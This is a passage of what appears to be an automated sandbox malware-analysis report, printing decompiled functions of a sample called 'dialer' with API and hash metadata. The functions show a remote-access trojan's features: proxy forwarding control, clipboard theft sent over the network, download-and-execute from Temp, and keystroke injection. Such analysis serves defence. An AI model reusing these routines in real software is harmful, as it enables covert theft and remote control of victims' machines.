											if(_t73 == 0) {
												goto L61;
											} else {
												_t129 = _a32;
												if(MultiByteToWideChar(_t129, 1, _v36, _t128, _t73, _v44) == 0) {
													goto L61;
												} else {
													_t77 = MultiByteToWideChar(_t129, 9, _v40, _t99, _t126, _t126);
													_v36 = _t77;
													if(_t77 == 0) {
														goto L61;
													} else {
														_t121 = _t77 + _t77;
														_t108 = _t121 + 8;
														asm("sbb eax, eax");
														if((_t121 + 0x00000008 & _t77) == 0) {
															_t130 = _t126;
															goto L56;
														} else {
															asm("sbb eax, eax");
															_t81 = _t77 & _t121 + 0x00000008;
															_t108 = _t121 + 8;
															if((_t77 & _t121 + 0x00000008) > 0x400) {
																asm("sbb eax, eax");
																_t130 = E0043E61D(_t108, _t81 & _t108);
																_pop(_t108);
																if(_t130 == 0) {
																	goto L59;
																} else {
																	 *_t130 = 0xdddd;
																	goto L54;
																}
															} else {
																asm("sbb eax, eax");
																E00450080();
																_t130 = _t133;
																if(_t130 == 0) {
																	L59:
																	_t100 = _v32;
																} else {
																	 *_t130 = 0xcccc;
																	L54:
																	_t130 =  &(_t130[4]);
																	L56:
																	if(_t130 == 0 || MultiByteToWideChar(_a32, 1, _v40, _t99, _t130, _v36) == 0) {
																		goto L59;
																	} else {
																		_t100 = _v32;
																		_t126 = L00440DAB(_t108, _t130, _v48, _a12, _v32, _v44, _t130, _v36, _t126, _t126, _t126);
																	}
																}
															}
														}
														E004304BD(_t130);
													}
												}
											}
										}
									}
								}
								E004304BD(_t100);
							}
						}
					}
				}
				L63:
				return E0042F61B(_v8 ^ _t132);
			}

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0044DAF1
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DB74
__alloca_probe_16.LIBCMT ref: 0044DBAC
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,0044DD1E,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC07
__alloca_probe_16.LIBCMT ref: 0044DC56
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC1E

Part of subcall function 0043E61D: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,0044DD1E,00000000,00000000,?,00000001,?,?,?,?), ref: 0044DC9A
__freea.LIBCMT ref: 0044DCC5
__freea.LIBCMT ref: 0044DCD1

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
String ID:
API String ID: 201697637-0
Opcode ID: d1efc3889ecc57394a22abd76ff854e0d4998e8e64a2da47529485e4d0a21682
Instruction ID: 32459ac01eef459e87745deb4d3fcc9efc23f9fccd5395e8f543d2d3ef9bbe94
Opcode Fuzzy Hash: d1efc3889ecc57394a22abd76ff854e0d4998e8e64a2da47529485e4d0a21682
Instruction Fuzzy Hash: 6D91B171E042169AFF208E65CC81EAFBBB5EF09714F14456BE901E7381D769DC40C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040F248, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 182
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040F248(char* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t23;
				void* _t29;
				char* _t32;
				intOrPtr _t45;
				char* _t46;
				char* _t53;
				char* _t58;
				intOrPtr _t110;
				void* _t114;
				void* _t115;
				char* _t117;
				void* _t118;
				void* _t119;
				void* _t121;
				signed int _t123;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t132;

				_t134 = __eflags;
				_t101 = __edx;
				_push(_t61);
				_t110 = _a4;
				E004020CC(_t61,  &_v76, __edx, __eflags, _t110 + 0x1c);
				SetEvent( *(_t110 + 0x34));
				_t23 = L00401F75( &_v80);
				E00404286( &_v80,  &_v56, 4, 0xffffffff);
				_t126 = (_t123 & 0xfffffff8) - 0x3c;
				E004020CC(_t61, _t126, _t101, _t134, 0x46c238);
				_t127 = _t126 - 0x18;
				E004020CC(_t61, _t127, _t101, _t134,  &_v72);
				_t29 = E00416DD0( &_v112, _t101);
				_t128 = _t127 + 0x30;
				_t114 =  *_t23 - 0x46;
				if(_t114 == 0) {
					_t32 = E0040A15B(L00401F75(L00401E29( &_v88, _t101, __eflags, 1)));
					_t61 = _t32;
					__eflags = _t32;
					if(__eflags == 0) {
						_t115 = _t128 - 0x18;
						_push("1");
						L19:
						_t101 = L00402F97( &_v32, L00401E29( &_v88, _t101, __eflags, 0), 0x46c238);
						E0040530D(_t61, _t115, _t34, _t110, __eflags);
						_push(0x85);
						E00404A6E(_t61, _t110, _t34, __eflags);
						L00401FA7();
						L20:
						L00401E54( &_v108, _t101);
						L00401FA7();
						L00401FA7();
						return 0;
					}
					_t117 = E0040A1B1(_t61, "StartForward");
					 *0x46bd3c = _t117;
					 *0x46bd38 = E0040A1B1(_t61, "StartReverse");
					 *0x46bd40 = E0040A1B1(_t61, "StopForward");
					_t45 = E0040A1B1(_t61, "StopReverse");
					_t101 = "GetDirectListeningPort";
					 *0x46bd48 = _t45;
					_t46 = E0040A1B1(_t61, "GetDirectListeningPort");
					 *0x46bd44 = _t46;
					__eflags = _t117;
					if(__eflags == 0) {
						L17:
						_t115 = _t128 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x46bd38;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46bd40;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t46;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46bd4c = 1;
					E004020CC(_t61, _t128 - 0x18, "GetDirectListeningPort", __eflags, L00401E29( &_v88, "GetDirectListeningPort", __eflags, 0));
					_push(0x76);
					L10:
					E00404A6E(_t61, _t110, _t101, __eflags);
					goto L20;
				}
				_t118 = _t114 - 1;
				if(_t118 == 0) {
					_t53 =  *0x46bd3c(E00436079(_t50, L00401F75(L00401E29( &_v88, _t101, __eflags, 0))));
					_t132 = _t128 - 0x14;
					L9:
					_t101 = _t53;
					E00416B7E(_t61, _t132, _t53);
					_push(0x77);
					goto L10;
				}
				_t119 = _t118 - 1;
				if(_t119 == 0) {
					__imp__#12( *0x46c774);
					_t58 =  *0x46bd38(_t29, E00436079(_t55, L00401F75(L00401E29( &_v92, _t101, __eflags, 0))) & 0x0000ffff);
					__eflags = _t58;
					_t99 =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					 *0x46bd4d =  !=  ? 1 :  *0x46bd4d & 0x000000ff;
					_t101 = _t58;
					E00416B7E(_t61, _t128 - 0x10, _t58);
					_push(0x78);
					goto L10;
				}
				_t121 = _t119 - 1;
				if(_t121 == 0) {
					_t53 =  *0x46bd40();
					_t132 = _t128 - 0x18;
					goto L9;
				}
				if(_t121 == 1) {
					 *0x46bd48();
					 *0x46bd4d = 0;
				}
				goto L20;
			}

APIs

SetEvent.KERNEL32(?,?), ref: 0040F267
inet_ntoa.WS2_32 ref: 0040F2FC

Strings

GetDirectListeningPort, xrefs: 0040F3EC
StartForward, xrefs: 0040F3AA
StopForward, xrefs: 0040F3CA
StopReverse, xrefs: 0040F3DB
StartReverse, xrefs: 0040F3B8

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
API String ID: 3578746661-168337528
Opcode ID: d3666aee05385caa0a95f99bd11f360f9ababd926d4c7005525a678d46d04523
Instruction ID: f9a444815650af3872de27879d45234466d6e45f99ea988061a4b43b2ad98d54
Opcode Fuzzy Hash: d3666aee05385caa0a95f99bd11f360f9ababd926d4c7005525a678d46d04523
Instruction Fuzzy Hash: 3351D631A043019BC714BB79DC5AA6E36A59B91318F40453FF801AB6E2EF7C994887DF

Uniqueness

Uniqueness Score: -1.00%

Function 004136BA, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108
filesynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E004136BA(void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t87;
				void* _t90;

				_t93 = __eflags;
				_t33 = E00402064(_t60,  &_v136, "\\");
				_t86 = E004075C4(_t60,  &_v112, E0043919A(_t60, __eflags, "Temp"), _t87, _t93, _t33);
				L00402F73(_t60,  &_v28, _t35, _t93,  &_a4);
				L00401FA7();
				_t68 =  &_v136;
				L00401FA7();
				_push(_t68);
				_push(_t68);
				_t41 = E004138F7(E0040D8E4( &_v316, _t35, _t93, L00401F75( &_v28), 0x10),  &_v316);
				_t94 = _t41;
				if(_t41 == 0) {
					E00402064(_t60, _t90 - 0x18, 0x45f6ac);
					_push(0x6f);
					_t73 = 0x46c7e8;
					goto L6;
				} else {
					_t86 =  &_a28;
					E00413907( &_v316,  &_a28, _t94);
					E0040D895( &_v316,  &_a28, _t94);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = L00401F75( &_v28);
					asm("movaps xmm0, [0x466080]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t96 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402064(_t60, _t90, 0x45f6ac);
						_push(0x70);
						E00404A6E(_t60, 0x46c7e8,  &_a28, _t96);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(L00401F75( &_v28));
					}
					_t97 = _t60 - 1;
					if(_t60 == 1) {
						E00402064(_t60, _t90 - 0x18, 0x45f6ac);
						_push(0x6e);
						_t73 = 0x46c7e8;
						L6:
						E00404A6E(_t60, _t73, _t86, _t97);
					}
				}
				L0040CFAB(_t60,  &_v316, 0x45f6ac);
				L00401FA7();
				L00401FA7();
				return L00401FA7();
			}

APIs

Part of subcall function 00413907: __EH_prolog.LIBCMT ref: 0041390C

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,0045F6AC), ref: 004137B7
CloseHandle.KERNEL32(00000000), ref: 004137C0
DeleteFileA.KERNEL32(00000000), ref: 004137CF
ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00413783

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

Strings

<, xrefs: 0041375E
@, xrefs: 00413765
Temp, xrefs: 004136DB

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: <$@$Temp
API String ID: 1704390241-1032778388
Opcode ID: 561b6cc24aa72b7d61b651cf218bb8cd61d1741a20a896e296297213a2e5afc7
Instruction ID: 2f37397737ec95128bf32f0f6142d0e98911ade1772a95a98b29c58449e4e073
Opcode Fuzzy Hash: 561b6cc24aa72b7d61b651cf218bb8cd61d1741a20a896e296297213a2e5afc7
Instruction Fuzzy Hash: D3417C719002099ADB14FB61CC56AEEB734AF00319F40417EF505760E2EF7C1B8ACB99

Uniqueness

Uniqueness Score: -1.00%

Function 0040628B, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 106
fileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040628B(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				void* _v20;
				long _v24;
				char _v48;
				char _v72;
				void _v100076;
				void* __ebx;
				void* _t37;
				WCHAR* _t39;
				long _t46;
				struct _OVERLAPPED* _t58;
				intOrPtr _t77;
				long _t81;
				void* _t82;
				void* _t84;
				void* _t87;

				E004505A0();
				_t74 =  &_a12;
				asm("xorps xmm0, xmm0");
				_v16 = __ecx;
				_t58 = 0;
				asm("movlpd [ebp-0x8], xmm0");
				_v24 = 0;
				E004032FA(0,  &_v48, __eflags, E00407516( &_v72,  &_a12, __eflags, L".part"));
				L00401ED0();
				_t37 = CreateFileW(L00401ECB( &_v48), 4, 0, 0, 2, 0x80, 0);
				_v20 = _t37;
				_t84 = _v8 - _a8;
				if(_t84 > 0) {
					L8:
					CloseHandle(_t37);
					_t39 = L00401ECB( &_a12);
					MoveFileW(L00401ECB( &_v48), _t39);
					_t58 = 1;
				} else {
					_t77 = _a4;
					if(_t84 < 0) {
						goto L3;
					} else {
						_t85 = _v12 - _t77;
						if(_v12 >= _t77) {
							goto L8;
						} else {
							while(1) {
								L3:
								_t46 = E00404B24( &_v100076, 0x186a0);
								_t81 = _t46;
								asm("cdq");
								_v12 = _v12 + _t46;
								asm("adc [ebp-0x4], edx");
								WriteFile(_v20,  &_v100076, _t81,  &_v24, _t58);
								_t82 = _t82 - 0x18;
								E0040208B(_t58, _t82, _t74, _t85,  &_v12, 8);
								E00404A6E(_t58, _v16, _t74, _t85, 0x57, _v16);
								if(_t81 <= 0) {
									break;
								}
								_t87 = _v8 - _a8;
								if(_t87 < 0 || _t87 <= 0 && _v12 < _t77) {
									continue;
								} else {
									_t37 = _v20;
									goto L8;
								}
								goto L9;
							}
							CloseHandle(_v20);
							DeleteFileW(L00401ECB( &_v48));
						}
					}
				}
				L9:
				L00401ED0();
				L00401ED0();
				return _t58;
			}

0x00406293
0x0040629c
0x004062a0
0x004062a3
0x004062a6
0x004062a8
0x004062b5
0x004062c2
0x004062ca
0x004062e4
0x004062ed
0x004062f0
0x004062f3
0x00406365
0x00406366
0x0040636f
0x0040637e
0x00406384
0x004062f5
0x004062f5
0x004062f8
0x00000000
0x004062fa
0x004062fa
0x004062fd
0x00000000
0x004062ff
0x004062ff
0x004062ff
0x0040630e
0x00406313
0x00406315
0x00406316
0x0040631d
0x0040632c
0x00406332
0x0040633d
0x00406347
0x0040634e
0x00000000
0x00000000
0x00406356
0x00406359
0x00000000
0x00406362
0x00406362
0x00000000
0x00406362
0x00000000
0x00406359
0x004063a2
0x004063b1
0x004063b1
0x004062fd
0x004062f8
0x00406386
0x00406389
0x00406391
0x0040639e

APIs

Part of subcall function 00407516: char_traits.LIBCPMT ref: 00407531

CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 004062E4
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 0040632C
CloseHandle.KERNEL32(00000000), ref: 00406366
MoveFileW.KERNEL32(00000000,00000000), ref: 0040637E
CloseHandle.KERNEL32(?,00000057,?,00000008), ref: 004063A2
DeleteFileW.KERNEL32(00000000), ref: 004063B1

Strings

.part, xrefs: 004062AD

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreateDeleteMoveWritechar_traits
String ID: .part
API String ID: 820096542-3499674018
Opcode ID: 0b08d7c8f89f4ae88afe83d6d6890c2d5d8692f079fd1b54d9283a4737391721
Instruction ID: d9bd7d9a32dec13802f65ee1536d1b778e09315ea91cc40d0f5a3459ff757ad6
Opcode Fuzzy Hash: 0b08d7c8f89f4ae88afe83d6d6890c2d5d8692f079fd1b54d9283a4737391721
Instruction Fuzzy Hash: 10314971D00219AFCB10EFA5DD569EEB778FB44356F10847AF812B3191DA34AA44CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044326D, Relevance: 12.2, APIs: 8, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0044326D(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x46a00c; // 0x3dad585e
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = L0043EE69(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E0042F61B(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E004304BD(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0044132F(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E004304BD(_t101);
									goto L36;
								}
								_t62 = E0044132F(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E004304BD(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E0043E61D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00450080();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0044132F(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E0043E61D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00450080();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 004432C7
__alloca_probe_16.LIBCMT ref: 004432FF
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,00428772,?,?,?,004434BE,00000001,00000001,?), ref: 0044334D
__alloca_probe_16.LIBCMT ref: 004433E4
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00443447
__freea.LIBCMT ref: 00443454

Part of subcall function 0043E61D: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042EB9C,?,?,00401676,?,?,?,?,?), ref: 0043E64F

__freea.LIBCMT ref: 0044345D
__freea.LIBCMT ref: 00443482

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
String ID:
API String ID: 3864826663-0
Opcode ID: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
Instruction ID: 0cad5e9ef2b3b2de0836d9d1cfed8af2ee8cc4fd49053d42945b5b1fc1f44aaa
Opcode Fuzzy Hash: 62498b2ee06e030f5c60595c331dd3b474f73ff538d16402fb36f2dd318d4ec5
Instruction Fuzzy Hash: 1F511672A00216ABFB264E61DC41EEF77A9EB44B56F14466AFD04D6280DB3CDD408698

Uniqueness

Uniqueness Score: -1.00%

Function 00414C27, Relevance: 12.1, APIs: 8, Instructions: 101keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,00000001,0000001C,00000000,00000000), ref: 00414C5B
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00414C79
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00414C96
SendInput.USER32(00000001,00000001,0000001C,00000000,00000000,00000000), ref: 00414CA8
SendInput.USER32(00000001,00000001,0000001C), ref: 00414CBF
SendInput.USER32(00000001,00000001,0000001C), ref: 00414CDC
SendInput.USER32(00000001,00000001,0000001C), ref: 00414CF8
SendInput.USER32(00000001,?,0000001C,?), ref: 00414D15

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: InputSend
String ID:
API String ID: 3431551938-0
Opcode ID: ed704877f79a1861f0ef6c7f9208c79a4962e565769cf043444fc865a23b94ea
Instruction ID: 1b64be7561c92d10bf9b9bd03787ac9aa3cd918c72c1ca9b971e857a72a28f7a
Opcode Fuzzy Hash: ed704877f79a1861f0ef6c7f9208c79a4962e565769cf043444fc865a23b94ea
Instruction Fuzzy Hash: 56314271D5025DA9FB109BD1CC46FFFBB7CAF58B14F04000AE600AA1C1D6E995C58BE5

Uniqueness

Uniqueness Score: -1.00%

Function 00412724, Relevance: 12.0, APIs: 8, Instructions: 49
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00412724(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				void* _t16;
				struct HWND__* _t23;
				void* _t38;
				void* _t41;

				if(OpenClipboard(_t23) != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t23) != 0) {
						_t38 = GetClipboardData(0xd);
						_t16 = GlobalLock(_t38);
						GlobalUnlock(_t38);
						CloseClipboard();
						_t29 =  !=  ? _t16 : 0x45f714;
						E0040425F(_t23,  &_a36,  !=  ? _t16 : 0x45f714);
						_t34 =  &_a32;
						E00416CF4(_t23, _t41 - 0x18,  &_a32);
						_push(0x6b);
						E00404A6E(_t23, 0x46c768,  &_a32, _t16);
						L00401ED0();
					}
				}
				L00401E54( &_a16, _t34);
				L00401FA7();
				L00401FA7();
				return 0;
			}

APIs

OpenClipboard.USER32 ref: 00412725
EmptyClipboard.USER32 ref: 00412733
CloseClipboard.USER32 ref: 00412739
OpenClipboard.USER32 ref: 00412740
GetClipboardData.USER32 ref: 00412750
GlobalLock.KERNEL32 ref: 00412759
GlobalUnlock.KERNEL32(00000000), ref: 00412762
CloseClipboard.USER32 ref: 00412768

Part of subcall function 00404A6E: send.WS2_32(?,00000000,00000000,00000000), ref: 00404AE2

Memory Dump Source

Source File: 00000012.00000002.331374887.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.331467233.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_dialer.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
String ID:
API String ID: 2172192267-0
Opcode ID: b41a75f227100de5b93510063d07bff1ec11f8c1ae7a32dbd0f192b5edc047f4
Instruction ID: 4156f71339dd3ecea6f92ec0e14f94680420b0c666956b6fa8fd4283cc091fe2
Opcode Fuzzy Hash: b41a75f227100de5b93510063d07bff1ec11f8c1ae7a32dbd0f192b5edc047f4
Instruction Fuzzy Hash: 7F0161312043008BC314BF71ED49AAEB7A5AF90743F44457FF906D21A2DF38CA588A5A

Uniqueness

Uniqueness Score: -1.00%

Function 00411D70, Relevance: 11.0, APIs: 7, Instructions: 458
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00411D70(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a32, intOrPtr _a603996450) {
				char _v116;
				char _v120;
				char _v140;
				char _v156;
				char _v164;
				void* _v172;
				char _v192;
				void* _v196;
				char _v212;
				char _v216;
				void* _v220;
				char _v240;
				void* _v244;
				char _v252;
				char _v264;
				void* _v268;
				void* _v284;
				char _v288;
				void* _v292;
				char _v304;
				char _v308;
				char _v312;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v364;
				char _v368;
				long _v372;
				int _v376;
				char _v396;
				char _v400;
				char _v404;
				int _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v452;
				char _v500;
				char _v504;
				void* __esi;
				void* _t228;
				void* _t230;
				intOrPtr _t358;
				intOrPtr _t359;
				void* _t360;
				void* _t362;
				signed int _t363;
				signed int _t369;
				void* _t372;
				void* _t373;
				void* _t374;
				void* _t378;
				void* _t384;

				_t383 = __eflags;
				_t344 = __edx;
				_t278 = __ebx;
				_push(__ebx);
				_t358 = _a4;
				E004020CC(__ebx,  &_v308, __edx, __eflags, _t358 + 0x1c);
				SetEvent( *(_t358 + 0x34));
				_t359 =  *((intOrPtr*)(L00401F75( &_v312)));
				E00404286( &_v312,  &_v288, 4, 0xffffffff);
				_t372 = (_t369 & 0xfffffff8) - 0x18c;
				E004020CC(__ebx, _t372, _t344, _t383, 0x46c238);
				_t373 = _t372 - 0x18;
				E004020CC(__ebx, _t373, _t344, _t383,  &_v304);
				E00416DD0( &_v444, _t344);
				_t374 = _t373 + 0x30;
				_t384 = _t359 - 0x8f;
				if(_t384 > 0) {
					_t360 = _t359 + 0xffffff70;
					__eflags = _t360 - 0x22;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t360 + 0x412eb0) & 0x000000ff) * 4 +  &M00412E64))) {
							case 0:
								__ecx =  &_v420;
								__ecx = L00401E29( &_v420, __edx, __eflags, 0);
								__eax = L00401F75(__ecx);
								__ecx = __eax;
								__eax = L00407F85(__ecx);
								goto L125;
							case 1:
								__ecx =  &_v420;
								__ecx = L00401E29( &_v420, __edx, __eflags, 0);
